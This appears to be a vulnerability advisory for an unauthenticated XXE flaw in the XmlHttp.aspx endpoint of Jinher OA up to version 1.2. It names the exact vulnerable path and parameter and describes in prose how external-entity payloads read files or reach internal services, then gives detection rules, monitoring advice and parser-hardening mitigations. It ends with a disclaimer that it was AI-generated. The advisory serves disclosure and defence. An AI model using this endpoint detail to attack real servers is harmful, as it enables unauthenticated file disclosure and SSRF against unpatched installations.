CVE-2025-10091 Overview
A vulnerability has been identified in Jinher OA versions up to 1.2 that allows XML External Entity (XXE) injection through the XML Handler component. The vulnerability exists in the file /c6/Jhsoft.Web.projectmanage/ProjectManage/XmlHttp.aspx/?Type=add, where improper handling of XML input enables attackers to reference external entities. Remote exploitation is possible, and exploit details have been publicly disclosed.
Critical Impact
This XXE vulnerability could allow attackers to read sensitive files from the server, perform server-side request forgery (SSRF), or cause denial of service conditions. The public availability of exploit information increases the risk of active exploitation.
Affected Products
- Jinher OA up to version 1.2
- XML Handler component (XmlHttp.aspx)
- Project Management module (Jhsoft.Web.projectmanage)
Discovery Timeline
- 2025-09-08 - CVE-2025-10091 published to NVD
- 2025-10-09 - Last updated in NVD database
Technical Details for CVE-2025-10091
Vulnerability Analysis
This vulnerability is classified under CWE-611 (Improper Restriction of XML External Entity Reference) and CWE-610 (Externally Controlled Reference to a Resource in Another Sphere). The XXE vulnerability occurs when the application processes XML input without properly restricting external entity references. This allows an attacker to craft malicious XML payloads that can reference internal or external resources, potentially leading to information disclosure, server-side request forgery, or denial of service.
The vulnerable endpoint /c6/Jhsoft.Web.projectmanage/ProjectManage/XmlHttp.aspx with the Type=add parameter processes XML data without adequate input validation or entity resolution restrictions. When the XML parser encounters an external entity declaration, it attempts to resolve and include the referenced resource, which an attacker can exploit to access sensitive system files or internal network resources.
Root Cause
The root cause of this vulnerability is the improper configuration of the XML parser used by the Jinher OA application. The parser does not disable external entity processing, allowing attackers to define and reference external entities within XML documents. This misconfiguration permits the resolution of external resources, including local file paths and network locations, during XML parsing operations.
Attack Vector
The attack is network-accessible and requires no authentication or user interaction to exploit. An attacker can send specially crafted HTTP requests containing malicious XML payloads to the vulnerable XmlHttp.aspx endpoint. The XML payload would include external entity declarations that reference sensitive files (such as configuration files containing credentials) or internal network services.
The exploitation typically involves crafting an XML document with a DOCTYPE declaration that defines an external entity pointing to a target resource. When the server parses this XML, it resolves the entity and may include the contents of the referenced file in error messages or response data, enabling data exfiltration.
For detailed technical analysis and proof-of-concept information, refer to the GitHub CVE Issue Discussion and VulDB Entry #323046.
Detection Methods for CVE-2025-10091
Indicators of Compromise
- Suspicious HTTP requests to /c6/Jhsoft.Web.projectmanage/ProjectManage/XmlHttp.aspx containing XML payloads with DOCTYPE declarations
- Log entries showing XML parsing errors or external entity resolution failures
- Outbound connections from the web server to unexpected internal or external resources
- Access to sensitive system files from the web application process
Detection Strategies
- Implement web application firewall (WAF) rules to detect and block requests containing XXE attack patterns such as <!ENTITY or <!DOCTYPE declarations with external references
- Monitor application logs for XML parsing exceptions or errors related to entity resolution
- Deploy intrusion detection system (IDS) signatures to identify XXE payload patterns in HTTP traffic
- Review access logs for repeated requests to the vulnerable endpoint with varying XML content
Monitoring Recommendations
- Enable detailed logging on the Jinher OA application server to capture all requests to the vulnerable endpoint
- Set up alerts for anomalous outbound network connections originating from the web server
- Monitor file access patterns on the server for unauthorized reads of sensitive configuration files
- Implement network segmentation monitoring to detect potential SSRF exploitation attempts
How to Mitigate CVE-2025-10091
Immediate Actions Required
- Restrict network access to the vulnerable /c6/Jhsoft.Web.projectmanage/ProjectManage/XmlHttp.aspx endpoint using firewall rules or access control lists
- Implement WAF rules to block requests containing XML external entity declarations
- Review and audit other XML processing endpoints in the Jinher OA application for similar vulnerabilities
- Consider temporarily disabling the Project Management module if not critical to business operations
Patch Information
At the time of publication, no official vendor patch has been identified in the available CVE data. Organizations should monitor Jinher's official channels for security updates. For additional information, consult the VulDB Entry #323046 and VulDB Submission #644864.
Workarounds
- Configure the XML parser to disable external entity processing and DTD processing entirely
- Implement input validation to reject XML documents containing DOCTYPE declarations or external entity references
- Deploy a reverse proxy or WAF to filter malicious XML content before it reaches the application
- Apply network segmentation to limit the impact of potential SSRF attacks originating from the vulnerable server
Recommended XML parser hardening configurations should disable DTD processing, external general entities, and external parameter entities. Contact Jinher support for application-specific configuration guidance, or implement these protections at the web server or WAF level until an official patch is available.
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
